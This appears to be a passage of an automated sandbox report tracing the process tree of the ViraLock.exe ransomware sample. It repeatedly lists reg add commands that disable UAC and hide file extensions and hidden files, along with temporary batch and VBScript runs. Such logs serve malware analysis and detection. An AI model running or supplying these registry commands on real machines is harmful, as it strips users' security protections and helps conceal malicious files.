reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
162⤵
- UAC bypass
PID:3200

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BuQkUIkQ.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
162⤵
PID:4224

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
163⤵
PID:3640

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
160⤵
- Modifies visibility of file extensions in Explorer
PID:2192

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
160⤵
PID:5068

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
160⤵
- UAC bypass
PID:4944

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
161⤵
PID:3788

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PMYcQEMU.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
160⤵
PID:3336

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
161⤵
PID:748

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
158⤵
- Modifies visibility of file extensions in Explorer
PID:2292

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
158⤵
PID:272

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
158⤵
- UAC bypass
PID:948

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JQoAYkQA.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
158⤵
PID:2024

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
159⤵
PID:3996

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
156⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:2972

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
156⤵
PID:1276

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
156⤵
- UAC bypass
PID:2368

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uiYwQUAo.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
156⤵
PID:464

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
157⤵
PID:4324

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
154⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:3140

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
154⤵
- Modifies registry key
PID:1128

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
154⤵
- UAC bypass
PID:2488

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
155⤵
PID:1356

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cQsIMwoM.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
154⤵
PID:4804

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
155⤵
PID:3464

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
152⤵
- Modifies visibility of file extensions in Explorer
PID:4808

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
153⤵
PID:4224

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
152⤵
PID:3780

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
152⤵
- UAC bypass
PID:4260

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SMkcIkUU.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
152⤵
PID:1104

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
153⤵
PID:4028

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
150⤵
- Modifies visibility of file extensions in Explorer
PID:2016

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
150⤵
PID:4436

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
151⤵
PID:296

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
150⤵
- UAC bypass
PID:948

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VUQckwEQ.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
150⤵
PID:1484

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
151⤵
PID:4916

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
151⤵
PID:3300

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
148⤵
- Modifies visibility of file extensions in Explorer
PID:3780

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
148⤵
PID:992

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
148⤵
- UAC bypass
PID:4816

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JkAMMQUQ.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
148⤵
PID:1708

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
149⤵
PID:888

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
146⤵
PID:3748

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
146⤵
PID:3832

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
147⤵
PID:5108

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
146⤵
- UAC bypass
PID:2704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FCoIgYcs.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
146⤵
PID:412

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
147⤵
PID:1584

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
147⤵
PID:4712

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
144⤵
- Modifies visibility of file extensions in Explorer
PID:4928

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
144⤵
PID:3140

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
144⤵
- UAC bypass
PID:1328

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
145⤵
PID:740

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZQAososo.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
144⤵
PID:2948

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
145⤵
PID:3608

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
142⤵
PID:284

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
142⤵
PID:2972

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
143⤵
PID:116

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
142⤵
- UAC bypass
PID:2880

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GwooAgIU.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
142⤵
PID:2536

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
143⤵
PID:4676

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
140⤵
- Modifies visibility of file extensions in Explorer
PID:1708

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
141⤵
PID:3788

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
140⤵
PID:2156

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
141⤵
PID:1148

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
140⤵
- UAC bypass
PID:3108

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AwYkQMUw.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
140⤵
PID:3336

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
141⤵
PID:4228

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
138⤵
- Modifies visibility of file extensions in Explorer
PID:2612

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
139⤵
PID:4340

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
138⤵
PID:2872

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
138⤵
- UAC bypass
PID:4560

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cCIokQgs.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
138⤵
PID:2920

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
139⤵
PID:3024

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
136⤵
PID:2360

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
137⤵
PID:4492

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
136⤵
PID:4296

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
137⤵
PID:2520

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
136⤵
- UAC bypass
PID:4896

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tcEAIAQY.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
136⤵
PID:2596

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
137⤵
PID:2900

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
134⤵
PID:4832

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
135⤵
PID:5040

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
134⤵
PID:3516

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
134⤵
- UAC bypass
PID:3180

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jykYsMoQ.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
134⤵
PID:2184

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
135⤵
PID:4704

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
135⤵
PID:2192

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
132⤵
- Modifies visibility of file extensions in Explorer
PID:3992

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
132⤵
PID:464

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
133⤵
PID:4056

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
132⤵
- UAC bypass
PID:3236

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
133⤵
PID:3640

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xmcUIMgo.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
132⤵
PID:3140

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
133⤵
PID:3940

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
130⤵
- Modifies visibility of file extensions in Explorer
PID:4456

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
130⤵
PID:4352

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
130⤵
- UAC bypass
PID:3088

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YowEUcgk.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
130⤵
PID:4032

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
131⤵
PID:4392

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
128⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:1656

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
128⤵
PID:1316

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
128⤵
- UAC bypass
PID:2924

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EWcEQkww.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
128⤵
PID:1548

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
129⤵
PID:2016

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
129⤵
PID:4728

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
126⤵
- Modifies visibility of file extensions in Explorer
PID:4272

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
126⤵
PID:4340

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
126⤵
PID:2536

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wAEMoIUM.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
126⤵
PID:3948

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
127⤵
PID:4436

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
124⤵
PID:428

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
124⤵
PID:4712

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
124⤵
- UAC bypass
PID:3016

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xYMMYkwA.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
124⤵
PID:4456

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
125⤵
PID:2620

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
122⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:2664

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
123⤵
PID:716

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
122⤵
PID:4324

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
122⤵
PID:5100

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
123⤵
PID:3704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rKUwEUIo.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
122⤵
PID:4704

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
123⤵
PID:208

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
120⤵
PID:4680

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
120⤵
- Modifies registry key
PID:1548

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
120⤵
- UAC bypass
- Modifies registry key
PID:4808

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OQoIUkkU.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
120⤵
PID:628

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
121⤵
PID:4032

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
118⤵
- Modifies visibility of file extensions in Explorer
PID:2880

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
118⤵
PID:1656

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
118⤵
- UAC bypass
- Modifies registry key
PID:3788

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SAYwYwUg.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
118⤵
PID:3608

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
119⤵
PID:1356

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
116⤵
- Modifies visibility of file extensions in Explorer
PID:4676

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
116⤵
- Modifies registry key
PID:888

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
116⤵
PID:3172

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wAIsocIk.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
116⤵
PID:3436

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
117⤵
PID:2872

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
114⤵
- Modifies visibility of file extensions in Explorer
PID:2188

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
114⤵
PID:2440

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
114⤵
- UAC bypass
PID:3128

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cqAYwYQo.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
114⤵
PID:5108

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
115⤵
PID:3088

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
112⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:2428

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
112⤵
PID:2880

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
112⤵
- UAC bypass
PID:1500

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rOskoksI.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
112⤵
PID:1688

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
113⤵
PID:3608

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
110⤵
- Modifies registry key
PID:2900

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
110⤵
PID:1584

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
110⤵
- UAC bypass
PID:4180

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jowYoQgw.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
110⤵
PID:1316

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
111⤵
PID:1704

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
108⤵
- Modifies visibility of file extensions in Explorer
PID:3788

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
108⤵
PID:3992

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
108⤵
- UAC bypass
PID:1952

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TaYIkUEU.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
108⤵
PID:4340

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
109⤵
PID:644

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
106⤵
- Modifies visibility of file extensions in Explorer
PID:1704

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
106⤵
PID:4040

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
107⤵
PID:2624

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
106⤵
PID:3660

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WiYEkQIo.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
106⤵
PID:740

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
107⤵
PID:2880

C:\Windows\SysWOW64\reg.exe
